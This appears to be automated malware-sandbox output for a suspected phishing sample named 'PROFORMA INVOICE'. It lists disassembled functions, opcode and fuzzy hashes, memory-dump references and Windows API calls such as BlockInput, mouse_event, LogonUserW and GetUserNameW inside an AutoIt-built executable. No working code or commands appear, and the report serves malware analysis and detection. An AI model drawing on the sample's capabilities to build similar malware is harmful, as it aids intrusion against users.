Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 47c3bc71adbd3238041da6d90765f5e2cb8fccd8ff4f029e805b6a77c426650c
Instruction ID: 57388e5e5dd77b272826a813cf5df862d4600a49dcc70775e2d4010f464e4a1c
Opcode Fuzzy Hash: 47c3bc71adbd3238041da6d90765f5e2cb8fccd8ff4f029e805b6a77c426650c
Instruction Fuzzy Hash: CEA25B71D04259CFDB24CF69C8807ADB7B1FF48324F2581AAD859AB391D7349E81EB90

Function 00F8D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390eeb87bb12045f999b4fbe15e676140f306c22754c4815a8f8a4d7b8db4284
Instruction ID: 8f4eedfdad2e6a6f42c464d50bbe2ff7c7b699ac4de75c29a5b9b9ae1cc9f06c
Opcode Fuzzy Hash: 390eeb87bb12045f999b4fbe15e676140f306c22754c4815a8f8a4d7b8db4284
Instruction Fuzzy Hash: 45322622D29F454DD763A634CC22335639CAFB73D4F15D727E819B59EAEB29C483A200

Function 00F696C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: fa8d00a8358cccea8d3021d3f43971bdea8d362ea26150502c6873d9d27793a1
Instruction ID: 4824fb0c6ab33c1331254edae1c1154b650a749bd63388d1ad49a02cd0680023
Opcode Fuzzy Hash: fa8d00a8358cccea8d3021d3f43971bdea8d362ea26150502c6873d9d27793a1
Instruction Fuzzy Hash: 70229B71A083019FD724DF24C891B6FB7E9EF84310F14491EF89A97291DBB5E944EB82

Function 00F9038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60fd84e8cd37b3f9ac9341f4f489379b73d57cd6fa667c1049d9f2e2bfecb60e
Instruction ID: bc4777b3ff027aa96eccd12693554904f348a27790862600b8263a0c9f4225bc
Opcode Fuzzy Hash: 60fd84e8cd37b3f9ac9341f4f489379b73d57cd6fa667c1049d9f2e2bfecb60e
Instruction Fuzzy Hash: 7AB11420D2AF454DD72396398831336BA5CAFBB6D5F92D71BFC1A74D22EB2181839180

Function 00FAB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00FAB6DF

Part of subcall function 00F8344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FABDC3,00000000,?,?,?,?,00FABF70,00000000,?), ref: 00F83453
Part of subcall function 00F8344A: __aulldiv.LIBCMT ref: 00F83473

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 09c4ab6ff02b871051aacf25bc855ab789964c41aa303a68377a4e12005829de
Instruction ID: 493e9fc4c7d1ed148b0dd2884f09c1e1903203af2ffbe768abda97514d0db760
Opcode Fuzzy Hash: 09c4ab6ff02b871051aacf25bc855ab789964c41aa303a68377a4e12005829de
Instruction Fuzzy Hash: 48218476634510CBC729CF38C481A92B7E1EB99320B248E6DE4E5CF2C1CB78B905DB54

Function 00FB6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00FB6ACA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 1ee1f0cb50cf9072f7b08d59dfc08819283ebd6c034b6630103689143e1cfd6f
Instruction ID: 84cb3ddc734c87cca1d02dc26a3d0e0271d929f29341bf9135222302b1c6252f
Opcode Fuzzy Hash: 1ee1f0cb50cf9072f7b08d59dfc08819283ebd6c034b6630103689143e1cfd6f
Instruction Fuzzy Hash: 69E092362002046FC700EB59DC04996B7ECAF74361F04C416E905D7250CAB8E8049B90

Function 00FA74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00FA750A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 56d349eae765e6c5b7008066bf54566b5cbcb2ad28a42c454da66a87ca6b07f2
Instruction ID: 7e3e9b9ff63aea4f979676aa962f760296cd85e40ba9f425cfc7db2b4e7db3fb
Opcode Fuzzy Hash: 56d349eae765e6c5b7008066bf54566b5cbcb2ad28a42c454da66a87ca6b07f2
Instruction Fuzzy Hash: 57D09EE696C745BDEC1967249C1BFB71508F306B91FD845497A03D90C0A8D47D02B035

Function 00F9B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F9AD3E), ref: 00F9B124

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 4439da2f0994f4b3017d2be137a78d6a7864a17eff1c87347a0e7b3e4efcf77a
Instruction ID: 8f184bcdfa4e65ec0cb29c5f612299b648ad4c1e48fe12f133503721731eadbe
Opcode Fuzzy Hash: 4439da2f0994f4b3017d2be137a78d6a7864a17eff1c87347a0e7b3e4efcf77a
Instruction Fuzzy Hash: 82D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA25D94A1C675D531AB50

Function 00FDB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00FDB352

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 64b7393c4f615365105a9dd48e92865093d968bd43f2472ae2af11620bded40e
Instruction ID: 6ee2b312ff7a8f9788392c0ea4043bfccce9ff05292884807f82b86c271750b7
Opcode Fuzzy Hash: 64b7393c4f615365105a9dd48e92865093d968bd43f2472ae2af11620bded40e
Instruction Fuzzy Hash: 16C04CB240015DDFC751CBC0C984AEEB7BCAB04301F1440929205F1110D7709B45AB76

Function 00F88189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F8818F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0b99eb0c839153ee20265af0d9eeca0e28cda91dbb737fb09beda8b290ad433a
Instruction ID: 63ef84e136ebde8f252244a493ba7a7986a3c1b24290fa6037dec6524760ea85
Opcode Fuzzy Hash: 0b99eb0c839153ee20265af0d9eeca0e28cda91dbb737fb09beda8b290ad433a
Instruction Fuzzy Hash: D4A0223200020CFFCF002F82FC088883F2CFB002A0B000020F80C08830CB33A820AAC2

Function 00F6E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485b8288b7f14a2a16905b13e7fd46593e5fb46989412efcb06030dc73ee4709
Instruction ID: 2ff3bf1075fcc1f0e35d9d21beb8f7234a1f2061055c3151b46a03c11a61b569
Opcode Fuzzy Hash: 485b8288b7f14a2a16905b13e7fd46593e5fb46989412efcb06030dc73ee4709
Instruction Fuzzy Hash: A122DF7AD00205CFCB24DF58C440BAEB7B1FF18314F18816AD95A9B391E735AD85EB91

Function 00F693F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 897292b628e9e5aa1c926abe9a2665c1c830acb48f9c23fed66f937a4a11a5ca
Instruction ID: cd51824a346e70a45d04bc4a3fde82813a64eb2d01f99e15b45259c967316454
Opcode Fuzzy Hash: 897292b628e9e5aa1c926abe9a2665c1c830acb48f9c23fed66f937a4a11a5ca
Instruction Fuzzy Hash: 0612BF71A00209DFDF14DFA5D981AAEB7F6FF48300F14852AE406E7250EB3AAD10EB51

Function 00F6AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: ddeb6de30444bc16761adabaad74ab120080a3f76357bb2f876f475014ee5421
Instruction ID: 54f315f3a8f4a7a4c7bbca0731fe887fc756a7418a089b3cbc834822c4ab326e
Opcode Fuzzy Hash: ddeb6de30444bc16761adabaad74ab120080a3f76357bb2f876f475014ee5421
Instruction Fuzzy Hash: F402B271E00205EBCF14DF68D9816AEBBB5FF48300F14806AE806DB355EB39DA55EB91

Function 00F802A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 2ff6af207e1370faf4eb1991532390521375dd923ddf5ec8993e1bd3030c54e4
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 3CC1B4326051930ADF6D863A843457EBAA15EA27B131A477ED8B7CB4D5FF20C52CE720

Function 00F806D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: e2bede49c5034586a27ad51d8593e1f9bfbbdf9d1220c54fd6ee0efa5c9b0d78
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: E5C1B1336051930AEFAD4639C43457EBAA15AA2BB131A077ED4B7CB5D5EF20C52CE720

Function 00F7FE6F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: ab999d2d3908940e4a9671e68c2cd4fbbe2f9ee77c1dbddbeccd57c3845d9a96
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 31C1E4326051930ADF6D863AC43457EFAA25AA27B131A437ED4B7CB4D1EF20C52CE721

Function 00F7FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 06f41374a0ab1dd31902ecdfc972e09361b5c7efa48587a4870b900d0cfda9cd
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 99C1A43260909309DF2D4639C47453EBBA15AA2BB131A877FD4BBCB5D5EF20C52CE621

Function 00FBA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00FBA2FE
DeleteObject.GDI32(00000000), ref: 00FBA310
DestroyWindow.USER32 ref: 00FBA31E
GetDesktopWindow.USER32 ref: 00FBA338
GetWindowRect.USER32(00000000), ref: 00FBA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00FBA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00FBA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA4D8
GetClientRect.USER32(00000000,?), ref: 00FBA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FBA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA55E
GlobalLock.KERNEL32(00000000), ref: 00FBA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA576
GlobalUnlock.KERNEL32(00000000), ref: 00FBA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA586
GlobalFree.KERNEL32(00000000), ref: 00FBA591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00FED9BC,00000000), ref: 00FBA5B9
GlobalFree.KERNEL32(00000000), ref: 00FBA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00FBA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00FBA60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FBA81D

Strings

AutoIt v3, xrefs: 00FBA4D0
, xrefs: 00FBA7A3
DISPLAY, xrefs: 00FBA680
static, xrefs: 00FBA518, 00FBA66F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 396cc2bba8f0b178ebe53874d11905a73ef627d96060017a53e5486994f1a8e2
Instruction ID: 23c267ec5ada2a86cf192269627484e6c7167754b41020908608e8ba5434f09f
Opcode Fuzzy Hash: 396cc2bba8f0b178ebe53874d11905a73ef627d96060017a53e5486994f1a8e2
Instruction Fuzzy Hash: DA026D71A00248EFDB14DFA5DD89EAE7BB9EB48310F148158F915AB2A0CB75DD01EF60

Function 00FCD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00FCD2DB
GetSysColorBrush.USER32(0000000F), ref: 00FCD30C
GetSysColor.USER32(0000000F), ref: 00FCD318
SetBkColor.GDI32(?,000000FF), ref: 00FCD332
SelectObject.GDI32(?,00000000), ref: 00FCD341
InflateRect.USER32(?,000000FF,000000FF), ref: 00FCD36C
GetSysColor.USER32(00000010), ref: 00FCD374
CreateSolidBrush.GDI32(00000000), ref: 00FCD37B
FrameRect.USER32(?,?,00000000), ref: 00FCD38A
DeleteObject.GDI32(00000000), ref: 00FCD391
InflateRect.USER32(?,000000FE,000000FE), ref: 00FCD3DC
FillRect.USER32(?,?,00000000), ref: 00FCD40E
GetWindowLongW.USER32(?,000000F0), ref: 00FCD439

Part of subcall function 00FCD575: GetSysColor.USER32(00000012), ref: 00FCD5AE
Part of subcall function 00FCD575: SetTextColor.GDI32(?,?), ref: 00FCD5B2
Part of subcall function 00FCD575: GetSysColorBrush.USER32(0000000F), ref: 00FCD5C8
Part of subcall function 00FCD575: GetSysColor.USER32(0000000F), ref: 00FCD5D3
Part of subcall function 00FCD575: GetSysColor.USER32(00000011), ref: 00FCD5F0
Part of subcall function 00FCD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FCD5FE
Part of subcall function 00FCD575: SelectObject.GDI32(?,00000000), ref: 00FCD60F
Part of subcall function 00FCD575: SetBkColor.GDI32(?,00000000), ref: 00FCD618
Part of subcall function 00FCD575: SelectObject.GDI32(?,?), ref: 00FCD625
Part of subcall function 00FCD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00FCD644
Part of subcall function 00FCD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FCD65B
Part of subcall function 00FCD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00FCD670
Part of subcall function 00FCD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FCD698

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

